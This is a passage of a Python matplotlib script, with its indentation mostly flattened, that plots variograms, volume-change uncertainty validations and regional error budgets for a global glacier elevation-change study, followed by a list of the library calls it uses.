c -= (sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000) - sph_var(0,list_c[k], a1s[-1-k]*1000,a1s[-2-j]*1000))
elif j==5:
c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
c = max(0, c)
list_c.append(c)
list_c.reverse()
#compute variogram
for i in range(len(vect)):
val = 0
for j in range(len(a1s)):
val += sph_var(0,list_c[j],a1s[j]*1000,vect[i])
mod.append(val)
mod = np.array(mod)
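# Hedged sanity check (illustrative, not executed here): far beyond the
# longest range, every spherical model reaches its full sill, so mod[-1]
# should be close to sum(list_c) as long as none of the sills are NaN.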
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,3))
ax.set_ylim((0,50))
ax.set_xticks([0,1,2])
ax.text(0.075, 0.975, 'a', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.vlines(0.15,0,60,color=col[0],linewidth=0.5)
ax.text(0.4,c1s[1]-5,'$s_0$',color=col[0],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(2,0,60,color=col[1],linewidth=0.5)
ax.text(2.2,c1s[2]-5,'$s_1$',color=col[1],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.set_ylabel('Variance of elevation differences (m$^2$)')
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[:2,2:4])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,30))
ax.set_ylim((0,50))
ax.set_xticks([0,10,20])
# ax.text(0.075, 0.975, 'B', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(5,0,60,color=col[2],linewidth=0.5)
ax.text(6,c1s[3]-5,'$s_2$',color=col[2],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(20,0,60,color=col[3],linewidth=0.5)
ax.text(21,c1s[4]-5,'$s_3$',color=col[3],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted',label='Global mean variance')
ax.set_yticks([])
ax.set_xlabel('Spatial lag (km)')
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[:2,4:6])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,550))
ax.set_ylim((0,50))
ax.set_xticks([0,100,200,300,400,500])
# ax.text(0.075, 0.975, 'C', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(50,0,60,colors=[col[4]],linewidth=0.5)
ax.text(70,c1s[5]-5,'$s_4$',color=col[4],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(200,0,60,colors=[col[5]],linewidth=0.5)
ax.text(220,c1s[6]-7,'$s_5$',color=col[5],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(500,0,60,colors=[col[6]],linewidth=0.5)
ax.text(480,c1s[6]-7,'$s_6$',color=col[6],ha='right',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.tick_params(width=0.35,length=2.5)
ax.plot([],[],color='grey',linestyle='dashed',label='Sum of spherical models')
ax.scatter([],[],color='black',marker='x',label='Empirical variance')
ax.vlines([],[],[],color=col[0],label='0.15 km',linewidth=0.5)
ax.vlines([],[],[],color=col[1],label='2 km',linewidth=0.5)
ax.vlines([],[],[],color=col[2],label='5 km',linewidth=0.5)
ax.vlines([],[],[],color=col[3],label='20 km',linewidth=0.5)
ax.vlines([],[],[],color=col[4],label='50 km',linewidth=0.5)
ax.vlines([],[],[],color=col[5],label='200 km',linewidth=0.5)
ax.vlines([],[],[],color=col[6],label='500 km',linewidth=0.5)
ax.legend(loc='lower right',ncol=3,title='Spatial correlations of GP elevation at $\Delta t$ = 720 days',title_fontsize=6,columnspacing=0.5)
ax.set_yticks([])
ax = fig.add_subplot(grid[2:4,:6])
coefs_list = []
y = None
# arr_res[0:1,4]=25
# arr_res[arr_res>25] = 25.
# arr_res[4,2]=np.nan
# arr_res[3:,3]=np.nan
# arr_res[0,3]=25.
# arr_res[0,3:] = np.nan
for i in [0,1,2,3,4,5,6]:
# i=0
# arr_res[-1,0]=np.nan
coefs , _ = scipy.optimize.curve_fit(lambda t,a,b:a*t+b, np.array(dts)[~np.isnan(arr_res[:,i])], np.sqrt(arr_res[:,i][~np.isnan(arr_res[:,i])]))
coefs_list.append(coefs)
x = np.arange(0, 3000, 1)
if y is not None:
y0 = y
else:
y0 = x*0
    y = coefs[0]*x+coefs[1]  # - 2*np.sin(x/365.2224*np.pi)**2
    # y[y>25]=25.
    # y[y<y0]=y0[y<y0]
ax.plot(x,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color=col[i])
ax.fill_between(x,y0**2 -2*np.sin(x/365.2224*2*np.pi)**2,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color = col[i],alpha=0.2)
# ax.fill_between(x,40*np.ones(len(x)),y,color='tab:gray')
# arr_res[0,3:]=25.
for i in [0,1,2,3,4,5,6]:
ax.scatter(dts,arr_res[:,i],color=col[i])
# ax.hlines(25,0,3000,linestyles='dashed',color='tab:gray')
ax.plot([],[],color='black',label='Model fit')
ax.fill_between([],[],color=col[0],label='0.15 km')
ax.fill_between([],[],color=col[1],label='2 km')
ax.fill_between([],[],color=col[2],label='5 km')
ax.fill_between([],[],color=col[3],label='20 km')
ax.scatter([],[],color='black',label='Empirical\nvariance')
ax.fill_between([],[],color=col[4],label='50 km')
ax.fill_between([],[],color=col[5],label='200 km')
ax.fill_between([],[],color=col[6],label='500 km')
ax.set_xlim([0,1370])
ax.set_ylim([0,78])
ax.set_ylabel('Variance of elevation differences (m$^{2}$)')
ax.set_xlabel('Days to closest observation $\Delta t$')
ax.vlines(720,0,100,colors='black',linestyles='dashed')
ax.text(740,5,'$\overline{s_{0}(\Delta t)}$: correlated until 0.15 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:orange')
ax.text(800,22,'$s_{1}(\Delta t)$: correlated until 2 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:blue')
ax.text(1150,35,'$s_{3}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:red')
ax.text(1250,48,'$s_{5}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:brown')
# ax.text(1000,22,'Fully correlated = Systematic',bbox= dict(boxstyle='round', facecolor='white', alpha=0.5),color='dimgrey')
# plt.xscale('log')
ax.legend(loc='upper left',bbox_to_anchor=(0.0625,0,0.9375,1),title='Spatial correlations of\nGP elevation with\ntime lag to observation',title_fontsize=6,ncol=2,columnspacing=0.5)
ax.text(0.025, 0.975, 'b', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.text(740,45,'panel (a)',fontweight='bold',va='bottom',ha='left')
# plt.savefig('/home/atom/ongoing/work_worldwide/figures/Figure_S12.png',dpi=360)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[4:6,:6])
corr_ranges = [150, 2000, 5000, 20000, 50000]
coefs = [np.array([1.26694247e-03, 3.03486839e+00]),
np.array([1.35708936e-03, 4.05065698e+00]),
np.array([1.42572733e-03, 4.20851582e+00]),
np.array([1.82537137e-03, 4.28515920e+00]),
np.array([1.87250755e-03, 4.31311254e+00]),
np.array([2.06249620e-03, 4.33582812e+00])]
thresh = [0, 0, 0, 180, 180]
ind = [1, 1, 1, 2, 1]
def sill_frac(t, a, b, c, d):
if t >= c:
return (coefs[-1][0] * t + coefs[-1][1]) ** 2 - (a * t + b) ** 2 - (
(coefs[-1][1] + c * coefs[-1][0]) ** 2 - (coefs[-1 - d][1] + c * coefs[-1 - d][0]) ** 2)
else:
return 0
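# As read from the expression above, sill_frac(t, a, b, c, d) returns, for a
# time lag t, the part of the total variance (the longest-range fit,
# coefs[-1]) that is correlated beyond the range whose linear fit is (a, b),
# offset so that the contribution is zero at t = c; functools.partial below
# freezes one such callable per correlation range.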
corr_std_dt = [functools.partial(sill_frac,a=coefs[i][0],b=coefs[i][1],c=thresh[i],d=ind[i]) for i in range(len(corr_ranges))]
list_areas = [100*2**i for i in np.arange(3,31)]
list_df=[]
for area in list_areas:
dt = [180,540,900,1260]
perc_area = [0.5,0.2,0.2,0.1]
dx=100.
nsamp_dt = np.zeros(len(dt)) * np.nan
err_corr = np.zeros((len(dt), len(corr_ranges) + 1)) * np.nan
for j in np.arange(len(dt)):
final_num_err_dt = 10.
nsamp_dt[j] = perc_area[j]*area
sum_var = 0
for k in range(len(corr_ranges)+1):
if k != len(corr_ranges):
err_corr[j,k] = np.sqrt(max(0,corr_std_dt[len(corr_ranges)-1-k](dt[j]) - sum_var))
sum_var += err_corr[j,k] ** 2
else:
err_corr[j, k]=np.sqrt(max(0,final_num_err_dt**2-sum_var))
final_num_err_corr, int_err_corr = (np.zeros( len(corr_ranges) + 1) * np.nan for i in range(2))
for k in range(len(corr_ranges) + 1):
final_num_err_corr[k] = np.sqrt(np.nansum(err_corr[:, k] * nsamp_dt) / np.nansum(nsamp_dt))
if k == 0:
tmp_length = 200000
else:
tmp_length = corr_ranges[len(corr_ranges) - k]
if final_num_err_corr[k] == 0:
int_err_corr[k] = 0
else:
int_err_corr[k] = std_err(final_num_err_corr[k],
neff_circ(area, [(tmp_length, 'Sph', final_num_err_corr[k] ** 2)]))
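            # std_err and neff_circ come from pyddem.volint_tools: neff_circ
            # estimates the number of effective samples for a circular area
            # under a spherical variogram of the given range, and std_err
            # scales the 1-sigma error by that effective sample count.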
df_int = pd.DataFrame()
for i in range(len(corr_ranges)):
df_int['err_corr_'+str(corr_ranges[i])] =[int_err_corr[len(corr_ranges)-i]]
df_int['err_corr_200000'] =[int_err_corr[0]]
df_int['area']=area
list_df.append(df_int)
df = pd.concat(list_df)
#First panel: sources for volume change
col = ['tab:orange','tab:blue','tab:olive','tab:red','tab:cyan','tab:brown','tab:gray','tab:pink','tab:purple']
tmp_y = np.zeros(len(list_areas))
tmp_y_next = np.zeros(len(list_areas))
for i in range(6):
tmp_y = tmp_y_next
tmp_y_next = tmp_y + (2*df.iloc[:len(list_areas),i])**2
ax.fill_between(x=np.array(list_areas)/1000000,y1=tmp_y,y2=tmp_y_next,interpolate=True,color=col[i],alpha=0.5,edgecolor=None)
if i == 0:
ax.plot(np.array(list_areas)/1000000,tmp_y_next,color='black',linestyle='--')
ax.fill_between([],[],color=col[0],label='0.15 km',alpha=0.5)
ax.fill_between([],[],color=col[1],label='2 km',alpha=0.5)
ax.fill_between([],[],color=col[2],label='5 km',alpha=0.5)
ax.fill_between([],[],color=col[3],label='20 km',alpha=0.5)
ax.fill_between([],[],color=col[4],label='50 km',alpha=0.5)
ax.fill_between([],[],color=col[5],label='200 km',alpha=0.5)
ax.plot([],[],color='black',linestyle='--',label='Limit GP/spatial\ncorrelation sources')
ax.set_xscale('log')
ax.set_xlabel('Glacier area (km²)')
ax.set_ylabel('Squared uncertainties of\nspecific volume change (m²)')
ax.set_ylim((0,30))
ax.set_xlim((0.005,7.5*10**10/1000000))
handles, labels = ax.get_legend_handles_labels()
# sort both labels and handles by labels
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t: t[0]))
print(labels[0:2])
ax.legend(handles[0:2]+(handles[-1],)+handles[2:-1], labels[0:2]+(labels[-1],)+labels[2:-1],title='Uncertainty sources for specific volume change\n(i.e. mean elevation change)',title_fontsize=6,ncol=3,columnspacing=0.5)
ax.text(0.023,4*1.2,'Uncertainty \nsources from\npixel-wise\nGP regression\n(0.15 km)',color=plt.cm.Greys(0.8),va='center',ha='center')
ax.text(5,4*2,'Uncertainty sources from \nshort- to long-\nrange correlations\n(2 km - 200 km)',color=plt.cm.Greys(0.8),va='center',ha='center')
ax.text(0.025, 0.95, 'c', transform=ax.transAxes, fontsize=8, fontweight='bold', va='top', ha='left')
ax.tick_params(width=0.35,length=2.5)
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats
from pybob.ddem_tools import nmad
df_gp = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv')
df_hr = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.category.values=='matthias')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.area.values<1000000.)
ind = df_hr.perc_meas>0.70
list_rgiid = list(df_hr[ind].rgiid)
list_area = list(df_hr[df_hr.rgiid.isin(list_rgiid)].area)
list_rgiid = [rgiid for _, rgiid in sorted(zip(list_area,list_rgiid),reverse=True)]
list_area = sorted(list_area,reverse=True)
ax = fig.add_subplot(grid[:2, 7:])
kval = 3.5
# sites=np.unique(data['Site'])
# colors=['b','g','r','c','m','y','k','grey']
colors = ['tab:blue','tab:orange','tab:red','tab:grey']
# sites=sites.tolist()
ax.plot([-3, 0.5], [-3, 0.5], color='k', linestyle='-', linewidth=0.75)
label_list=[]
diff2 = []
list_area2 = []
for rgiid in list_rgiid:
df_gp_rgiid = df_gp[df_gp.rgiid==rgiid]
df_hr_rgiid = df_hr[df_hr.rgiid==rgiid]
if df_hr_rgiid.category.values[0]=='matthias':
col = colors[0]
elif df_hr_rgiid.category.values[0]=='brian':
col = colors[1]
else:
if df_hr_rgiid.site.values[0] in ['Chhota','Gangotri','Abramov','Mera']:
col = colors[2]
elif df_hr_rgiid.site.values[0] == 'Yukon':
col=colors[3]
elif df_hr_rgiid.site.values[0] == 'MontBlanc':
col=colors[0]
ax.errorbar(df_hr_rgiid.dhdt.values[0], df_gp_rgiid.dhdt.values[0],
xerr=df_hr_rgiid.err_dhdt.values[0],
yerr=df_gp_rgiid.err_dhdt.values[0],marker='o',mec='k',
ms=kval*(df_hr_rgiid.area.values[0]/1000000)**0.5/3, mew=0.25,elinewidth=0.25,ecolor=col,mfc=col,alpha=0.9)
#,ecolor=colors[sites.index(data['Site'][value])]mfc=colors[sites.index(data['Site'][value])],alpha=0.5)
diff2.append(df_hr_rgiid.dhdt.values[0]-df_gp_rgiid.dhdt.values[0])
list_area2.append(df_hr_rgiid.area.values[0])
ax.text(-1.9,0,'Mean bias:\n'+str(np.round(np.nanmean(diff2),2))+'$\pm$'+str(np.round(2*nmad(diff2)/np.sqrt(len(diff2)),2))+' m yr$^{-1}$',ha='center',va='center',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
print(np.nanmean(diff2))
print(np.nansum(np.array(diff2)*np.array(list_area2))/np.nansum(np.array(list_area2)))
ax.set_ylabel('Specific volume change (m yr$^{-1}$)')
ax.set_xlabel('High-resolution specific volume change (m yr$^{-1}$)')
#plt.legend(loc='upper left')
ax.set_xlim([-2.95, 0.5])
ax.set_ylim([-2.95, 0.5])
#mask = ~np.isnan(b_dot_anomaly) & ~np.isnan(dP)
# slope, intercept, r_value, p_value, std_err = stats.linregress(data['MB GEOD'], data['MB ASTER'])
# print(slope)
# print("r-squared:", r_value**2)
# print('std err:', std_err)
# plt.text(-320, -1250, 'Slope:' + str(np.round(slope, 2)))
# plt.text(-320, -1300, 'r$^{2}$:' + str(np.round(r_value**2, 2)))
## add symbols to show relative size of glaciers
ax.errorbar(-2500/1000,-150/1000,ms = kval*(5.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k',marker='o')
ax.errorbar(-2500/1000,-500/1000,ms = kval*(50.0**0.5)/3, xerr=0.0001, yerr=0.0001,color='k',marker='o')
ax.errorbar(-2500/1000,-1250/1000,ms = kval*(500.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k', marker='o')
ax.text(-2500/1000, -220/1000,'5 km$^2$',va='top',ha='center')
ax.text(-2500/1000, -650/1000,'50 km$^2$',va='top',ha='center')
ax.text(-2500/1000, -1730/1000,'500 km$^2$',va='top',ha='center')
ax.text(0.025,0.966,'d',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.plot([],[],color=colors[0],label='Alps',lw=1)
ax.plot([],[],color=colors[1],label='Western NA',lw=1)
ax.plot([],[],color=colors[2],label='High Mountain Asia',lw=1)
ax.plot([],[],color=colors[3],label='Alaska',lw=1)
ax.plot([],[],color='k',label='1:1 line',lw=0.5)
ax.legend(loc='lower right',title='Validation of volume changes with high-resolution DEMs',title_fontsize=6,ncol=3)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[4:6, 7:])
ax.text(0.025,0.966,'f',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_err_dhdt=[0.1,0.2,0.4,0.6,0.8,1,1.5,2]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_err_dhdt)-1):
ind = np.logical_and(df_gp.err_dhdt < vec_err_dhdt[i+1],df_gp.err_dhdt>=vec_err_dhdt[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
err_dhdt.append(err)
diff_dhdt.append(diff)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_err_dhdt[i+1],vec_err_dhdt[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i < 2:
va_text = 'bottom'
y_off = 0.1
if i == 0:
x_off = -0.05
else:
x_off = 0
    else:
        va_text = 'top'
        y_off = -0.1
        x_off = 0  # make sure x_off is defined on this branch as well
ax.text(bin_err[i]+x_off, list_err_emp[i] + y_off, str(nb_gla[i]) + ' gla.\n' + str(np.round(nb_95ci[i] * 100, 0)) + '%',
va=va_text, ha='center')
ax.plot([0,2],[0,2],color='k',label='1:1 line',lw=0.5)
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Error (1$\sigma$) comparison to HR elevation differences\n(printed: glacier number and $\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xlabel('Theoretical specific volume change uncertainty (m yr$^{-1}$)')
ax.set_ylabel('Empirical specific volume\nchange uncertainty (m yr$^{-1}$)')
ax.set_ylim((0,1.4))
ax.legend(loc='upper right',title='Validation of volume change uncertainties\nwith varying uncertainty size',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[2:4, 7:])
ax.text(0.025,0.966,'e',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_area=[0.01,0.05,0.2,1,5,20,200,1500]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_area)-1):
ind = np.logical_and(df_gp.area.values/1000000 < vec_area[i+1],df_gp.area.values/1000000>=vec_area[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
diff_dhdt.append(diff)
err_dhdt.append(err)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_area[i+1],vec_area[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i <2:
va_text = 'top'
y_off = -0.1
else:
va_text = 'bottom'
y_off = 0.1
ax.text(bin_err[i],list_err_emp[i]+y_off,str(nb_gla[i])+' gla.\n'+str(np.round(nb_95ci[i]*100,0))+'%',va=va_text,ha='center')
ax.plot(bin_err,list_err_the,color='black',label='Theoretical uncertainty (1$\sigma$):\nspatially integrated variograms',marker='x')
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Empirical uncertainty (1$\sigma$):\ncomparison to HR elevation differences\n(printed: glacier number and\n$\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xscale('log')
ax.set_xlabel('Glacier area (km$^{2}$)')
ax.set_ylabel('Specific volume\nchange uncertainty (m yr$^{-1}$)')
ax.set_ylim([0,1.4])
ax.legend(loc='upper right',title='Validation of volume change uncertainties\nwith varying glaciers area',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax2 = fig.add_subplot(grid[6:,:])
reg_dir = '/home/atom/ongoing/work_worldwide/vol/final'
list_fn_reg = [os.path.join(reg_dir,'dh_'+str(i).zfill(2)+'_rgi60_int_base_reg.csv') for i in np.arange(1,20)]
list_df_out = []
for fn_reg in list_fn_reg:
df = pd.read_csv(fn_reg)
mult_ann = 20
area = df.area.values[0]
dvol = (df[df.time == '2000-01-01'].dvol.values - df[df.time == '2020-01-01'].dvol.values)[0]
dh = dvol / area
err_dh = np.sqrt(
df[df.time == '2000-01-01'].err_dh.values[0] ** 2 +
df[df.time == '2020-01-01'].err_dh.values[0] ** 2)
err_dvol = np.sqrt((err_dh * area) ** 2 + (dh * df.perc_err_cont.values[0] / 100. * area) ** 2)
dvoldt = dvol / mult_ann
err_dvoldt = err_dvol / mult_ann
dmdt = dvol * 0.85 / 10 ** 9 / mult_ann
err_dmdt = np.sqrt((err_dvol * 0.85 / 10 ** 9) ** 2 + (
dvol * 0.06 / 10 ** 9) ** 2) / mult_ann
sq_err_dmdt_fromdh = (err_dh*area)**2 * (0.85 / mult_ann)**2 /area**2
sq_err_dmdt_fromarea = (dh * df.perc_err_cont.values[0] / 100. * area) ** 2 * (0.85 / mult_ann)**2 /area**2
sq_err_dmdt_fromdensity = (dvol * 0.06) ** 2 / mult_ann**2 / area**2
dmdtda = dmdt/area*10**9
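    # The three squared terms above decompose the squared uncertainty of the
    # specific mass change rate (dmdtda): up to floating point,
    #   sq_err_dmdt_fromdh + sq_err_dmdt_fromarea + sq_err_dmdt_fromdensity
    # equals (err_dmdt / area * 10 ** 9) ** 2, i.e. the elevation-change,
    # outline and density contributions sum to the total variance.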
df_out = pd.DataFrame()
df_out['region']=[df.reg.values[0]]
df_out['dmdtda'] = [dmdtda]
df_out['sq_err_fromdh'] = [sq_err_dmdt_fromdh]
df_out['sq_err_fromarea'] = [sq_err_dmdt_fromarea]
df_out['sq_err_fromdensity'] = [sq_err_dmdt_fromdensity]
df_out['area'] = [area]
list_df_out.append(df_out)
df_all = pd.concat(list_df_out)
df_g = pd.DataFrame()
df_g['region']=[21]
df_g['dmdtda'] = [np.nansum(df_all.dmdtda.values*df_all.area.values)/np.nansum(df_all.area.values)]
df_g['sq_err_fromdh'] = [np.nansum(df_all.sq_err_fromdh.values * df_all.area.values **2)/np.nansum(df_all.area.values)**2]
df_g['sq_err_fromarea'] = [np.nansum(df_all.sq_err_fromarea.values * df_all.area.values **2)/np.nansum(df_all.area.values)**2]
df_g['sq_err_fromdensity'] = [np.nansum(df_all.sq_err_fromdensity.values * df_all.area.values **2)/np.nansum(df_all.area.values)**2]
df_g['area'] = [np.nansum(df_all.area.values)]
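# The global aggregate above (df_g) and the one below (df_noper, excluding
# regions 05 and 19) combine regional errors as an area-weighted mean of
# independent regions: sigma^2 = sum_i(sigma_i^2 * A_i^2) / (sum_i A_i)^2.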
df_noper = pd.DataFrame()
ind = ~df_all.region.isin([5,19])
df_noper['region']=[20]
df_noper['dmdtda'] = [np.nansum(df_all[ind].dmdtda.values*df_all[ind].area.values)/np.nansum(df_all[ind].area.values)]
df_noper['sq_err_fromdh'] = np.nansum(df_all[ind].sq_err_fromdh.values * df_all[ind].area.values **2)/np.nansum(df_all[ind].area.values)**2
df_noper['sq_err_fromarea'] = np.nansum(df_all[ind].sq_err_fromarea.values * df_all[ind].area.values **2)/np.nansum(df_all[ind].area.values)**2
df_noper['sq_err_fromdensity'] = np.nansum(df_all[ind].sq_err_fromdensity.values * df_all[ind].area.values **2)/np.nansum(df_all[ind].area.values)**2
df_noper['area'] = [np.nansum(df_all[ind].area.values)]
df_all = pd.concat([df_all,df_noper,df_g])
ticks = ['Alaska (01)','Western Canada\nand USA (02)','Arctic Canada\nNorth (03)','Arctic Canada\nSouth (04)','Greenland\nPeriphery (05)', 'Iceland (06)','Svalbard and\nJan Mayen (07)', 'Scandinavia (08)','Russian\nArctic (09)','North Asia (10)','Central\nEurope (11)','Caucasus and\nMiddle East (12)','Central\nAsia (13)','South Asia\nWest (14)','South Asia\nEast (15)','Low\nLatitudes (16)','Southern\nAndes (17)','New\nZealand (18)','Antarctic and\nSubantarctic (19)','Global excl.\n 05 and 19','Global']
x_shift = 0
for i in np.arange(1,22):
if i==20:
x_shift+=2
df_tmp = df_all[df_all.region==i]
y1 = 4*df_tmp.sq_err_fromdh.values[0]
y2 = y1 + 4*df_tmp.sq_err_fromarea.values[0]
y3 = y2 + 4*df_tmp.sq_err_fromdensity.values[0]
ax2.fill_between(x_shift+np.array((i,i+1)),(0,0),(y1,y1),color='tab:red',edgecolor='white')
ax2.fill_between(x_shift+np.array((i,i+1)),(y1,y1),(y2,y2),color='tab:blue',edgecolor='white')
ax2.fill_between(x_shift+np.array((i,i+1)),(y2,y2),(y3,y3),color='tab:pink',edgecolor='white')
ax2.fill_between([],[],color='tab:red',label='Elevation change')
ax2.fill_between([],[],color='tab:blue',label='Glacier outlines')
ax2.fill_between([],[],color='tab:pink',label='Density conversion')
ax2.text(0.025, 0.95, 'g', transform=ax2.transAxes, fontsize=8, fontweight='bold', va='top', ha='left')
ax2.set_ylabel('Squared uncertainties of\nspecific mass change rate (m² w.e. yr$^{-2}$)')
ax2.set_xlabel('RGI region')
ax2.legend(title='Uncertainty sources for\nspecific mass change\nduring 2000-2019',loc='upper right',bbox_to_anchor=(0.3,1),title_fontsize=6)
ax2.set_xticks(list(np.arange(1.5,20.5))+[22.5,23.5])
ax2.set_xticklabels(ticks,rotation=90)
ax2.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0e'))
ax2.fill_between((22,24),(-0.00001,-0.00001),(4*0.000275,4*0.000275),facecolor='None',edgecolor='black')
ax2.text(23,4*0.0005,'panel (h)',fontweight='bold',va='bottom',ha='center')
ax2.tick_params(width=0.35,length=2.5)
ax3 = inset_axes(ax2,width="15%",height='50%',loc='upper right')
x_shift=0
for i in np.arange(20,22):
if i==20:
x_shift+=2
df_tmp = df_all[df_all.region==i]
y1 = 4*df_tmp.sq_err_fromdh.values[0]
y2 = y1 + 4*df_tmp.sq_err_fromarea.values[0]
y3 = y2 + 4*df_tmp.sq_err_fromdensity.values[0]
ax3.fill_between(x_shift+np.array((i,i+1)),(0,0),(y1,y1),color='tab:red',edgecolor='white')
ax3.fill_between(x_shift+np.array((i,i+1)),(y1,y1),(y2,y2),color='tab:blue',edgecolor='white')
ax3.fill_between(x_shift+np.array((i,i+1)),(y2,y2),(y3,y3),color='tab:pink',edgecolor='white')
ax3.set_xlim((22,24))
ax3.set_xticks([22.5,23.5])
ax3.set_ylim((-0.00001,4*0.000275))
ax3.set_xticklabels(ticks[-2:],rotation=90)
ax3.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0e'))
ax3.text(0.9, 0.95, 'h', transform=ax3.transAxes, fontsize=8, fontweight='bold', va='top', ha='right')
ax3.tick_params(width=0.35,length=2.5)
plt.savefig('/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg',dpi=500,bbox_inches='tight')
|
[
"numpy.abs",
"numpy.nanmedian",
"pandas.read_csv",
"numpy.isnan",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.arange",
"numpy.sin",
"pyddem.volint_tools.neff_circ",
"numpy.sqrt",
"numpy.round",
"numpy.nanmean",
"pandas.DataFrame",
"matplotlib.pyplot.rcParams.update",
"matplotlib.ticker.FormatStrFormatter",
"pandas.concat",
"functools.partial",
"numpy.nansum",
"pybob.ddem_tools.nmad",
"numpy.logical_and",
"mpl_toolkits.axes_grid.inset_locator.inset_axes",
"numpy.array",
"matplotlib.pyplot.GridSpec",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.cm.Greys"
] |
